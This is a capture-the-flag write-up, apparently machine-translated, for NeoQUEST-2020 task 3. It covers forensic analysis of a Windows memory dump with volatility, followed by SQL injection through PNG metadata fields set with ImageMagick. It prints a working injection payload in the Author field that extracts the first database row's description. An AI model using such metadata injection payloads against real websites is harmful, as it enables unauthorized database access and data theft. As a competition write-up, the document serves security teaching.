Forensics, SQL injection and long-suffering cat: analysis of task No. 3 of the online stage NeoQUEST-2020

Today we will consider the most controversial task of NeoQUEST-2020 : its first part is a champion in the number of participants who passed it, and the second part obeyed only a few. What is so special about him? Understand the cut!


Have you ever had to investigate a RAM dump? Do you know how many interesting things you can get from there? (spoiler: everything, including the results of running scripts, recent photos, as well as browser history).
What about exotic SQL injections? You upload a certain picture to the site, and you are given information from a closed database - is this not an ideal crime?
In the first part of the article, we will consider the tools for analyzing the memory dump and learn how to extract the information we need from there, and in the second part of the article we will clearly show the process of manipulating image tags for a tricky injection :)

So, the task is to download the archive, which contains a 1 GB binary file with the speaking name memdump.bin, based on which we can assume that this is a RAM dump. We will use the volatility framework for its research . Volatility supports various plugins that make it easy to search and extract from the dump various information useful for blackmailing an analyst. First, use the imageinfo command and get information about the dump:



Judging by the output of the imageinfo command, we are dealing with a Windows 7 memory dump. Next, we will look at the list of running processes in the system at the time the dump was removed using the pslist command:



In this list, you can see several interesting processes. Let's start the study with the chrome.exe process - you can always find something intriguing in the browser. There are additional plugins for volatility that automate the extraction of information from processes. For example, the chromehistory plugin will allow us to extract a browser visit history from a RAM dump:



In the history of chrome, several interesting things can be noticed at once. First, a link to the second part of the assignment, as well as search queries about metadata in PNG images, which is also a hint to the second part, but we will turn to this later. At the current stage, we are interested in requests for a promotional code for a discount to the site and pdf files, which hints at the object of further searches (running Acrobat Reader`a may also prompt us on this). Let's try to find pdf documents in a dump using the filescan command:



Good luck! It looks like there is some promo.pdf in the dump. Let's try to pull it using the dumpfiles command:



At this stage, minor difficulties may arise due to the fact that some pdf-document viewers may not recognize the file just extracted (you just need to delete the extra bytes at the end of the file). But are we really afraid of some extra bytes? :) In the end, open the document and see the QR code, having read which, we get the flag from the first part of the task (and at the same time the promotional code for receiving a gift from the NeoQUEST team - we give memorable prizes all participants who completed at least one assignment!).



Next, try to get the second flag. We return to the site, the link to which was found in the browser history. To access the site you need to enter a promotional code. We recall the search history in the browser and the description of the document itself (USE THIS TO JOIN), from which we can assume that the first flag is the promotional code we need. We enter it into the field and get to the site where we are offered to upload a picture:



Judging by how often the site freezes, our participants decided to experimentally verify the loading of all possible types of documents. A certain amount of time later we understand that only PNG images can be uploaded to the site. The next puzzle is the message “Not enough data to store this image, sorry!”, Which occurs when you try to upload a picture.

Returning to the history of the browser, we recall about requests of the form “add metadata to png file”. Using simple inferences, we conclude that, most likely, certain values ​​must be entered in the metadata to upload an image to a site. You can start by exploring the PNG format (for a description, for example, click here ). First, check the list of standard keywords for metadata PNG images, for example: "Author", "Description", etc. Using, for example, the convert utility from the ImageMagick set, add metadata to the test image:

convert test.png -set 'Title' '1' -set 'Author' '2' -set 'Description' '3' -set 'Copyright' '4 '-set' Creation Time '' 5 '-set' Software '' 6 '-set' Disclaimer '' 7 '-set 'Warning' '8' -set 'Source' '9' -set 'Comment' '0' out.png

We try to upload the resulting image to the site and enjoy the success:



It turns out that the necessary metadata fields are Title, Description, Author and Copyright.
A hint for this, by the way, can also be found in the memory dump: you can find the mention of the mr_cat.png file using volatility.



Our participants decided that it was with the help of Mr. Cat that it was necessary to inject the site (a lot of messages came to our mail with Mr. Cat in a compressed, inverted, reflected and other unsightly appearance), but the cat had nothing to do with it! He simply distracts and hints to the participants: well, look at me, there is something interesting inside! Inside the dump, the image was only partially preserved; however, in its residues, you can notice the necessary completed metadata fields:



Go ahead: now we can upload files to the site; however, what does it give and how to look for a flag? It is logical to assume that since metadata is required for downloading, it is possible that they are somehow used to store downloaded files (for example, as keys in a database). Hooray! We are approaching the dessert: we need to check the site for the possibility of SQL injection. We find out that if one of the parameters is substituted with a double quote ("), then the site will notify us of an error instead of loading the image:



Now we see the SQL query itself and understand what fields we can operate in order to construct an injection to extract data from the database used. As for the location of the flag, in this case it is logical to check the very first image that has been uploaded to the database. Also, during injection operation, you should pay attention to the fact that INSERT is executed in the request. This forces you to construct specific queries, because you cannot explicitly perform a SELECT operation from the same table into which you are inserting at the same time as the insert operation (INSERT).

Let’s make a request with which we pull out the Description of the first image in the database:

convert test1.png -set 'Title' '1' -set 'Author' '", (SELECT description FROM (SELECT * FROM picture) AS x limit 0,1)) - -' -set 'Description' '3' - set 'Copyright' '4' test.png

Upload the received image to the website and get the description in the Copyright field, which is a flag:



Hooray, task completed! We hope that we convinced everyone to double-check user input for the millionth time and also keep it safe apple of your eye from creating a dump of your RAM :)
Finish the article with a quote from the great sages: